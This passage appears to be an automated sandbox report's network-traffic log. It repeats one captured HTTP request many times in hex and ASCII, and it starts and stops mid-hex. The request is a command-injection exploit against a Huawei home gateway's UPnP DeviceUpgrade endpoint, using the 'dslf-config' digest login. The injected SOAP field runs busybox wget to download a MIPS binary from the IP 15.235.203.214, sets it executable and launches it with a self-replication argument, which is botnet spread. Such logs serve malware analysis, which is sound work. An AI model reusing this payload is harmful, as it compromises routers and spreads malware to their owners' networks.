75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 